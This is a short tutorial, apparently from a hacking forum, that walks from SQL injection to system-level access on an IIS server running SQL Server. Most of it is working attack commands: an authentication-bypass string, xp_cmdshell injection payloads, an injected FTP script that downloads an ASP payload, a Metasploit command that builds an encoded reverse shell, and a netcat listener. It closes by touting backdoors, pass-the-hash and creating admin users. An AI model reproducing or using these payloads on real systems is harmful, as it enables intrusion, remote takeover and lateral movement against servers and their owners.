Basic SQLi to System Level Access


Understanding of Sql Injection

From Sql Injection to System..

Let's start my first tutorial off with sql injection. If you do not know what sqli is, please go to google and perform some research.
This one is very rare, but it will give a good understanding of how sql injection can be used to gain access.

While I was out on a pentesting engagement last week I found an injection flaw in an application that was running on an older version of iis server. Through this flaw I was able to obtain system level access on the box because the server was running as a system level process. I figured that this would be a good tutorial to start since there is no other sqli tutorials on the site. Here is how I did it and the commands that were used.

The first thing that I noticed was that the server would actually respond to the hi' or 1=1;-- command, for those who don't know, this is the most basic command set used for sqli and authentication bypass. So the command was entered right into the user name text box the same way it is typed above.

Next I tested to see if the xp_cmdshell addon for sql server was running.. Sure enough it was, and here is the basic command I used:

' or 1=1;exec master..xp_cmdshell '"ipconfig" > c:\Inetpub\wwwroot\ipTest.txt';--

Next in the browser I typed to make sure the file was there and it issued the ipconfig command and wrote it to the text file. This verified that I could run commands against the box.

Now for the good stuff. I then created an ftp config file like so
' or 1=1;exec master..xp_cmdshell '"(echo open 21 & echo anonymous& echo anonymous& echo bin & echo get nu11.asp c:\Inetpub\wwwroot\nu11.asp & echo bye)" > c:\Inetpub\wwwroot\ftp.txt';--

If you notice there is a lack of spaces in some of the command. This is so the extra spaces are not added into the config file as it will mess the whole thing up and the process would have to be started over.

Now for the upload. I entered this command to ftp the file to the server using the config file I just created
' or 1=1;exec master..xp_cmdshell '"ftp -s:c:\Inetpub\wwwroot\ftp.txt" > c:\Inetpub\wwwroot\trans.txt';--

The outfile trans.txt at the end of the ftp command just issues out the commands that were in the config file so I can verify that the upload was successful.

If you are curious what the nu11.asp file is, here is the command used to generate it. The reason an asp file was chosen is because that is the only file that the server would run from the browser Wink

msfpayload windows/shell_reverse_tcp LHOST= LPORT=4444 R| msfencode -e x86/shikata_ga_nai -t asp > /tmp/nu11.asp

Now that my binary is on the server. I loaded up netcat, type nc -lp 4444, went back to the browser pointed at the target machine and typed
As you can see from the picture, it worked!
Game Over! At this point I was able to do anything I wanted, planting backdoors, running pass the hash against other machines on the network, create an admin user, anything.